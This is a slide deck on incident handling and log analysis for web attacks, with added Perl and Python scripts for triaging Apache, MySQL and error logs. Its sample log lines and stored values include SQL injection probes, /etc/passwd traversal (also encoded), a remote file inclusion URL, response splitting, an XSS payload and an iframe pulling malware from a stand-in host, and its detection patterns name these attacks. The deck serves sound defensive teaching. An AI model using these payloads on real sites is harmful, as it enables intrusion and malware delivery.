Incident Handling in a Web Driven World


Incident Handling & Log Analysis
in a Web Driven World
Manindra Kishore
Web Incidents - Overview
• A glimpse of popular web-based incidents
• Discussion of a sample incident
• Approach to incident analysis
A glimpse of a few popular incidents
• SQL injection
• XSS
• CSRF
• Broken authentication
• Broken authorization
• File inclusion
• Password brute force
• Directory traversal
• Malicious file upload
• Network enumeration
• …
A few attack objectives
• Force a connection to a malware-infected remote site
• Trick the user into connecting to a phishing site
• Steal data from the backend database
• Obtain sensitive information from other internal machines
• A common attack vector: SQL injection
A sample incident: malware download / visit to phishing sites
• SQL injection used to change values in the backend DB
• Values changed to point at known malware-distributing sites
• Each time the page loads, malware is downloaded
• Multiple systems end up under attacker control
Web site distributes malware
[Figure: attacker, the bank web server (http://bank.com/homepage.jsp) and the user. The sequence shown is:]
1. Attacker accesses http://bank.com/homepage.jsp and finds vulnerabilities in the page.
2. Attacker exploits them and adds an iframe tag; the home page gets infected:
   <html>
   <body>
   .
   .
   <iframe src="http://malware.com/malware"></iframe>
   .
   .
   </body>
   </html>
3. User (UserID & Pswd) sends an access request for http://bank.com/homepage.jsp; the infected page is served to the user.
4. A connection is made to the external site and malware is downloaded in the background.
Incident occurred!!!
What to do now?
What to do now?
A sample victimized 2-tier network
• The web server on the intranet got hacked.
• I don't know what else got hacked.
• I want incident analysis.
Acting ahead…
• Enumerate all entry points of the network
• Identify the components associated with the victimized component in the network traffic
• Obtain logs of all associated components
• Perform log analysis
• This presentation focuses primarily on attacks over the Internet.
• Analysis of intranet-based attacks involves more or less the same steps but is not the key focus here.
Candidates for log analysis (in this case)
• Cisco Internet router
• Cisco PIX Internet firewall
• Juniper intranet firewall
• Cisco L3 switch connecting all other servers
• IIS 6.0 web server
• Tomcat application server
• Microsoft SQL Server database
Grounds for forensics:
Log Analysis
A re-look at the attacks traceable through logs
A glimpse of the major attacks for which forensics can be done with different sets of logs:
• SQL injection
• XSS
• SSI injection
• Directory traversal attack
• PHP remote file inclusion attack
• Upload of malicious files
• Redirection attack
• Unwanted apps/directories open to the Internet
• Misusing links for activation/authentication
• Brute forcing
• Enumerating data based on error messages/app features
• Session hijack
• Deep URL
• Change password
• Automated attacks
• Response splitting attack
• Arbitrary HTTP methods allowed
Mapping attack patterns to logs
Attack pattern | Logs to analyse
SQL injection in the application to retrieve data | Web logs / Database logs
SQL injection in the application to inject an iframe into the database | Web logs / Database logs
Persistent XSS on the website | Web logs / Database logs / Database backup
PHP local and remote file inclusion to obtain source code and passwords | Web logs / Source code
PHP code injection to retrieve the database password | Web logs / Database logs
Anonymous FTP / brute-forced passwords, stealing the stored backup | FTP logs
Direct connection to the database to retrieve data | Database logs / OS logs
Files on the website found through directory browsing | Web logs
Brute forcing the SAM file, RDP in and stealing the database | OS logs
Uploading an executable that takes a backup of the database and dumps it out | Web logs / OS logs / Database logs
Vulnerability inside the application that allows DB backup/restore | Application logs / Database logs
Identification of all other network services and checking for any other way in | Individual network service logs
File upload of a malicious file | Web logs / OS logs / Database logs
Compromise of another server and access to this server through a vulnerability there or by abusing that server's trust | Network device logs (firewall + switch)
Physical access to the server and copying data to removable media | OS logs
Choosing the right Log for analysis
• Different device logs help in forensics of
different attack patterns
• Focusing on Internet-based attacks, the major components for analysis are
– Web Server
– Database Server
Individual Analysis of elements
The components under discussion
• Web Servers
– IIS
– Apache
• Database Servers
– MySQL
– MSSQL
Web Server – Log Analysis – Step 1
• Web server logs are huge
• Filter the relevant log entries for analysis – script-based approach
– Eliminate all requests for files that do not exist on the web server
• Obtain the list of all valid files from the web application's source tree
• Obtain all requests from the web server log with a 200 OK response
• Match the two, keep only the relevant requests and eliminate the rest
• Keep the eliminated requests in a separate file rather than deleting them: a burst of requests for non-existent files from one address is itself evidence of directory brute forcing, which is looked at later
Example –
• In a banking website we see a request for 3Dgames.php in the Apache log – it is obviously not valid.
• This can be confirmed by looking inside the source code directory and checking whether there really is a file called 3Dgames.php.
• If not, we need not waste time analysing those requests.
• A little basic Perl helps here.
A sample Perl Script
A sample script for finding out valid PHP pages - Can be modified for other types as well.
SCRIPT
#!/usr/bin/perl
use strict;
use warnings;

# page_list: one valid page name per line, taken from the source tree
open(my $page_fh, '<', 'page_list') or die "Cannot open file: $!";
chomp(my @all_pages = <$page_fh>);
close($page_fh);

# gateway_only200_OK: web server log lines already reduced to 200 responses
open(my $req_fh, '<', 'gateway_only200_OK') or die "Cannot open file: $!";
my @all_php_requests = <$req_fh>;
close($req_fh);

open(my $valid_fh, '>', 'all_valid_php') or die "Cannot open file: $!";
for my $page (@all_pages) {
    next if $page eq '';
    # \Q...\E matches the name literally (the dot in "x.php" is not a wildcard);
    # requiring a leading "/" and a following "?", space or quote stops
    # "index.php" from also selecting requests for "myindex.php"
    print $valid_fh grep { m{/\Q$page\E(?=[?\s"])} } @all_php_requests;
}
close($valid_fh);
Web Server – Log Analysis – Step 2
• Identifying valid variables in the remaining requests
– List all the valid variables from the page source code – script-based approach
– Compare all the requests for the presence of only valid variables
– If any invalid variable is found in a request, eliminate the request
– Eventually, keep only the requests in which all variables are valid
A sample Perl script output
204.9.126.178 - [05/Aug/2009:11:31:54 -0500] "GET /category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA%2C+&catid=search&searchgo.x=17&searchgo.y=12 HTTP/1.1"
• The variables here are q, catid, searchgo.x and searchgo.y
• The requested page is category.php
• Now look at the list of valid variables from the source code of the page category.php (script-based approach)
• Check whether the variables in the request appear in that list
• If not, it is not a valid request and can be eliminated
• Repeat the process for all requests (script-based approach as a whole)
• Eventually, keep only the requests whose variables are all valid
• Note that this request survives steps 1 and 2 if q, catid, searchgo.x and searchgo.y are all variables category.php reads: the page exists and the variable names are legitimate, while the value of q decodes to ' UNION SELECT TABLE_CATALOG, TABLE_SCHEMA, and is an SQL injection probe. Catching it is the job of step 3.
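Steps 1 and 2 together, as an added Python example (not part of the original slides, which use Perl): it parses constructed Apache combined-format lines, keeps only 200 responses for pages that exist, and then checks each request's query variables against a hypothetical per-page whitelist of the kind a code review would produce. Requests for unknown pages or with unexpected variables are kept in their own buckets rather than discarded, so they stay available for the automated-attack checks later. Page names, variable names, addresses and log lines are all made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical whitelist built from the application's source tree (made-up
# names): page -> the query variables that page actually reads.
VALID_PAGES = {
    "/index.php": set(),
    "/category.php": {"q", "catid", "searchgo.x", "searchgo.y"},
    "/login.php": {"user", "pwd"},
}

# Constructed Apache combined-format lines; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Aug/2009:11:30:01 -0500] "GET /index.php HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Aug/2009:11:30:07 -0500] "GET /category.php?catid=12 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Aug/2009:11:31:54 -0500] "GET /category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA%2C+&catid=search&searchgo.x=17&searchgo.y=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Aug/2009:11:32:10 -0500] "GET /3Dgames.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Aug/2009:11:32:11 -0500] "GET /3Dgames.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Aug/2009:11:32:30 -0500] "GET /index.php?cmd=id HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one log line into the fields the filter needs; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "page": parts.path,
        # keep_blank_values so "?q=" still counts as the variable q being sent
        "vars": {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)},
        "raw": line,
    }


def classify(entry):
    """Step 1: existing page with a 200 response; step 2: only known variables."""
    if entry["status"] != 200:
        return "not_200"
    allowed = VALID_PAGES.get(entry["page"])
    if allowed is None:
        return "unknown_page"
    if entry["vars"] - allowed:
        return "unexpected_variable"
    return "valid"


def triage(log_text):
    """Bucket every parsable line; 'valid' is what goes on to the pattern search."""
    buckets = {"valid": [], "unknown_page": [], "unexpected_variable": [], "not_200": []}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            buckets[classify(entry)].append(entry)
    return buckets


if __name__ == "__main__":
    for name, entries in triage(SAMPLE_LOG).items():
        print(name, len(entries))
        for e in entries:
            print("   ", e["ip"], e["page"], sorted(e["vars"]))
```

The injection request lands in the valid bucket on purpose: its page and variable names are legitimate, so nothing in steps 1 and 2 distinguishes it from normal traffic, and only the value-level pattern search of step 3 will.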
Web Server – Log Analysis – Step 3
Identify specific attack patterns – using a log parsing tool
• Example:
– To detect a directory traversal attack, parse the logs for the '../../' pattern, among others. Decode the request first: the same traversal arrives as ..%2F..%2F or, double-encoded, as %252e%252e%252f, and a plain search for '../' misses both.
• Sample queries to carry out the parsing process:
The Demos
• SQL injection
• Cross Site Scripting (XSS) – persistent
• Directory traversal
• PHP remote file inclusion
• URL redirection
• Automated / brute force attacks
– Password cracking
– Automated registrations
– Session prediction
– Directory brute forcing
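Step 3 and the demo list above, as an added Python example (not the slides' own tooling): it runs a handful of attack-pattern checks over constructed log lines, decoding the request target first so that percent-encoded and double-encoded traversal (..%2F, %252e%252e%252f) is still caught. The signatures are illustrative, not an exhaustive list. A parameter value that is an external URL is reported as url_in_param rather than as RFI or redirect, because which of the two it is depends on whether the application passes that parameter to include() or into a Location header, which the log alone does not tell you. Hostnames and addresses are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed log lines (not from any real server); only the request target matters.
SAMPLE_REQUESTS = [
    '198.51.100.9 - - [05/Aug/2009:11:31:54 -0500] "GET /category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA%2C+&catid=search HTTP/1.1" 200 5120',
    '198.51.100.9 - - [05/Aug/2009:11:33:02 -0500] "GET /download.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1811',
    '198.51.100.9 - - [05/Aug/2009:11:33:40 -0500] "GET /download.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1811',
    '198.51.100.9 - - [05/Aug/2009:11:34:15 -0500] "GET /index.php?page=http://malware.com/shell.txt HTTP/1.1" 200 77',
    '198.51.100.9 - - [05/Aug/2009:11:35:01 -0500] "GET /redirect.php?url=%0d%0aSet-Cookie:+x=y HTTP/1.1" 302 0',
    '203.0.113.5 - - [05/Aug/2009:11:36:00 -0500] "GET /category.php?catid=12 HTTP/1.1" 200 2310',
]

TARGET_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')

# Illustrative signatures; a real list is longer and tuned to the application.
PATTERNS = {
    "sqli": re.compile(r"union\s+select|'\s*(?:or|and)\s|--|information_schema", re.I),
    "traversal": re.compile(r"\.\./|\.\.\\"),
    "url_in_param": re.compile(r"^\s*(?:https?|ftp)://", re.I),
    "response_splitting": re.compile(r"[\r\n]"),
}


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../ too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def detect(line):
    """Names of the patterns that match the request path or any parameter value."""
    m = TARGET_RE.search(line)
    if not m:
        return set()
    parts = urlsplit(m.group("target"))
    # parse_qsl already decodes one layer and turns '+' into spaces
    values = [fully_decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    findings = set()
    if PATTERNS["traversal"].search(fully_decode(parts.path)):
        findings.add("traversal")
    for value in values:
        for name, rx in PATTERNS.items():
            if rx.search(value):
                findings.add(name)
    return findings


def scan(lines):
    """(line, findings) for every line that triggered at least one pattern."""
    results = []
    for line in lines:
        found = detect(line)
        if found:
            results.append((line, found))
    return results


if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS):
        print(sorted(found), line.split('"')[1])
```

Run the checks on the decoded values, never on the raw line: the raw third line contains no '../' at all, yet after two decoding rounds it is the same traversal as the second.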
DB Server – Log Analysis
• Attacks that can be detected by looking at
the logs of a DB Server
– SQL Injection
– XSS
– Brute Forcing the DB Server
Log Analysis – MySQL DB Server
• SQL Injection
1. Obtain the general query logs. They are generally found under the MySQL data directory (e.g. '/mysql/data/'). Note that the general query log is off by default and has to have been enabled beforehand (the general_log / general_log_file server options), so first confirm it was actually being written at the time of the incident.
2. Do a code review of the application and list all the SQL queries from all pages of the application.
3. Match all the queries in the query log against those obtained from the code review. All queries that match are valid queries; the rest are invalid. Store all these invalid queries in a separate file, as these are most probably the queries the attacker used for SQL injection.
Sample Grep Queries
Sample Grep queries to perform the action:
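The three MySQL steps above, as an added Python example (not from the original slides, which leave the grep queries to the reader): it reads constructed lines in the shape of a MySQL general query log, reduces each Query entry to a template by replacing string and numeric literals with ?, and reports every query whose template is not in a hypothetical set produced by the code review. Normalising both sides is what makes the match possible, since the log carries live values and the code review carries placeholders. Schema, users and log contents are made up.

```python
import re

# Hypothetical output of the code review: each query the application builds,
# with its literals already replaced by "?" (made-up schema).
REVIEWED_QUERIES = {
    "select name, price from products where catid = ?",
    "select name, price from products where name like ?",
    "select id from users where user = ? and pwd = ?",
}

# Constructed lines in the shape of a MySQL general query log; not real traffic.
SAMPLE_QUERY_LOG = """\
090805 11:30:07\t   12 Query\tSELECT name, price FROM products WHERE catid = 12
090805 11:31:54\t   12 Query\tSELECT name, price FROM products WHERE name LIKE '%' UNION SELECT TABLE_CATALOG, TABLE_SCHEMA -- %'
090805 11:32:30\t   13 Connect\tappuser@localhost on shopdb
090805 11:32:31\t   13 Query\tSELECT id FROM users WHERE user = 'alice' AND pwd = 's3cret'
090805 11:32:40\t   13 Query\tUPDATE products SET name = '<iframe src="http://malware.com/malware"></iframe>' WHERE catid = 7
090805 11:32:41\t   13 Quit\t
"""

# "YYMMDD HH:MM:SS<tab>  thread_id Command<tab>Argument"; the timestamp is
# omitted on lines that fall in the same second as the previous entry.
LOG_RE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
STRING_RE = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
NUMBER_RE = re.compile(r"\b\d+(?:\.\d+)?\b")


def normalize(sql):
    """Reduce a concrete query to its shape: literals -> ?, single spaces, lower-case."""
    sql = STRING_RE.sub("?", sql)
    sql = NUMBER_RE.sub("?", sql)
    return " ".join(sql.split()).rstrip(";").lower()


def queries(log_text):
    """Yield (thread_id, raw_sql) for every Query entry in the log."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("cmd") == "Query":
            yield m.group("thread"), m.group("arg")


def unreviewed(log_text, reviewed=REVIEWED_QUERIES):
    """Queries whose template the code review never produced: the SQL injection candidates."""
    return [(t, sql) for t, sql in queries(log_text) if normalize(sql) not in reviewed]


if __name__ == "__main__":
    for thread, sql in unreviewed(SAMPLE_QUERY_LOG):
        print(thread, sql)
```

Both flagged queries change the statement's structure, which is why they fall outside the reviewed set: the UNION appended to the LIKE, and an UPDATE on products that the application never issues (the iframe write from the sample incident). Queries the application builds dynamically (variable IN-lists, ORDER BY columns) produce several templates and each must be listed, or they will show up as false positives.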
• Cross Site Scripting (XSS): persistent
1. Parse the database for any instance of XSS. This can be done by pattern matching.
2. Note down all the XSS strings found in the DB.
3. Check the DB query log for instances of the strings noted down. This can be done with the grep command.
• Exact elements for monitoring – search for all of these tags and attributes:
<a>: href
<iframe>: src, url
<embed>: src, pluginspage, pluginurl, href
<object>: archive, classid, codebase, data, usemap
<script>: src
<img>: longdesc, src, usemap
<applet>: code, codebase, archive
<area>: href, coords
• This list covers URL-bearing attributes. Payloads that rely only on an event handler (onerror, onload, onmouseover) or on a javascript: URL in some other tag are not matched by it, so extend the search for those as well.
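The persistent XSS steps above, as an added Python example (not from the original slides): the tag and attribute list is turned into one regular expression, run over a constructed dump of the database's text columns, and every stored string that matches is then looked up verbatim in constructed general-query-log lines, which is the grep of step 3 and shows which statement wrote it. Table names, rows and log lines are made up.

```python
import re

# Tags and URL-bearing attributes from the list above, as tag -> attributes.
ELEMENTS = {
    "a": ["href"],
    "iframe": ["src", "url"],
    "embed": ["src", "pluginspage", "pluginurl", "href"],
    "object": ["archive", "classid", "codebase", "data", "usemap"],
    "script": ["src"],
    "img": ["longdesc", "src", "usemap"],
    "applet": ["code", "codebase", "archive"],
    "area": ["href", "coords"],
}

# One regex: an opening tag from the list carrying one of its listed attributes.
XSS_RE = re.compile(
    "|".join(
        r"<%s\b[^>]*?\b(?:%s)\s*=" % (tag, "|".join(attrs)) for tag, attrs in ELEMENTS.items()
    ),
    re.I | re.S,
)

# Constructed dump of text columns (table, column, primary key, value); not real data.
SAMPLE_ROWS = [
    ("products", "name", 7, '<iframe src="http://malware.com/malware"></iframe>'),
    ("products", "description", 8, "Great <b>deal</b> this week"),
    ("comments", "body", 41, "<img src=x onerror=alert(1)>"),
    ("comments", "body", 42, 'See <a href="/offers">our offers</a>'),
    ("users", "bio", 3, "I like &lt;script&gt; tags, honestly"),
]

# Constructed general-query-log lines to correlate the stored strings against.
SAMPLE_QUERY_LOG = """\
090805 11:32:40\t   13 Query\tUPDATE products SET name = '<iframe src="http://malware.com/malware"></iframe>' WHERE catid = 7
090805 11:33:02\t   13 Query\tINSERT INTO comments (body) VALUES ('See <a href="/offers">our offers</a>')
090805 11:33:10\t   14 Query\tSELECT name FROM products WHERE catid = 7
"""


def find_xss_candidates(rows):
    """Rows whose stored value contains a tag/attribute pair from the list."""
    return [(t, c, pk, v) for t, c, pk, v in rows if XSS_RE.search(v)]


def correlate(values, log_text):
    """For each stored string, the query-log lines containing it verbatim (the grep step)."""
    lines = log_text.splitlines()
    return {v: [line for line in lines if v in line] for v in values}


if __name__ == "__main__":
    hits = find_xss_candidates(SAMPLE_ROWS)
    for value, lines in correlate([v for _, _, _, v in hits], SAMPLE_QUERY_LOG).items():
        print(repr(value), "->", len(lines), "log line(s)")
```

The hit list needs a human pass: the internal link in comments row 42 matches because <a href> is on the list, and the correlation shows it was written by an ordinary INSERT, whereas the iframe in products row 7 traces back to an UPDATE. The img row matches on src, but only by luck of the payload; an onerror-only payload would not, which is the gap noted above the list. Values stored HTML-entity-encoded (like the users row) are not live markup and are correctly left alone.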
More attack patterns
• Brute forcing the DB server
– Go through the error logs to see whether there are repeated failed login attempts from the same host within a limited time duration.
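The brute-force check above, as an added Python example (not from the original slides): it extracts host, user and time from constructed lines in the shape of the MySQL error log's "Access denied for user" entries, then slides a time window over each host's failures and reports any host that exceeds a threshold, together with the distinct user names it tried, which separates password spraying from cracking a single account. Whether failed logins appear in the error log at all depends on the server's warning verbosity setting, so check that before relying on it. Hosts, users and timestamps are made up; the same window logic applies to repeated POSTs to a login page in the web logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lines in the shape of MySQL error-log "Access denied" entries; not real data.
SAMPLE_ERROR_LOG = """\
090805 11:40:01 [Warning] Access denied for user 'root'@'198.51.100.9' (using password: YES)
090805 11:40:02 [Warning] Access denied for user 'root'@'198.51.100.9' (using password: YES)
090805 11:40:02 [Warning] Access denied for user 'sa'@'198.51.100.9' (using password: YES)
090805 11:40:03 [Warning] Access denied for user 'admin'@'198.51.100.9' (using password: YES)
090805 11:40:05 [Warning] Access denied for user 'appuser'@'198.51.100.9' (using password: YES)
090805 11:40:07 [Warning] Access denied for user 'appuser'@'198.51.100.9' (using password: YES)
090805 11:40:12 [Warning] Access denied for user 'appuser'@'198.51.100.9' (using password: NO)
090805 11:40:20 [Warning] Access denied for user 'root'@'198.51.100.9' (using password: YES)
090805 11:15:33 [Warning] Access denied for user 'appuser'@'203.0.113.5' (using password: YES)
090805 11:41:02 [Warning] Access denied for user 'appuser'@'203.0.113.5' (using password: YES)
090805 11:41:03 [Note] /usr/sbin/mysqld: ready for connections.
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[\w+\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_error_log(text):
    """Extract (timestamp, user, host) from every 'Access denied' line."""
    events = []
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%y%m%d %H:%M:%S")
            events.append({"ts": ts, "user": m.group("user"), "host": m.group("host")})
    return events


def bursts(events, window_seconds, threshold):
    """Hosts with at least `threshold` failures inside some window of `window_seconds`."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    flagged = []
    span = timedelta(seconds=window_seconds)
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        best, start, best_window = 0, 0, None
        for end, e in enumerate(evs):
            # advance the window start until the window fits in `span`
            while e["ts"] - evs[start]["ts"] > span:
                start += 1
            if end - start + 1 > best:
                best, best_window = end - start + 1, (evs[start]["ts"], e["ts"])
        if best >= threshold:
            flagged.append({
                "host": host,
                "attempts": best,
                "first": best_window[0],
                "last": best_window[1],
                # many distinct users from one host is spraying; one user is cracking
                "users": sorted({e["user"] for e in evs}),
            })
    return flagged


if __name__ == "__main__":
    for f in bursts(parse_error_log(SAMPLE_ERROR_LOG), window_seconds=60, threshold=5):
        print(f["host"], f["attempts"], "failures between", f["first"], "and", f["last"], "users:", f["users"])
```

The second host has two failures forty minutes apart and is not reported; a fixed count without a time window would treat a forgetful operator and an attacker alike.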
What do we achieve…?
• Advantages of doing Log Analysis this way
• What have we not covered here and hope
to cover in the future?
Questions welcomed…
Thank You.
Manindra Kishore
Information Security Analyst / Consultant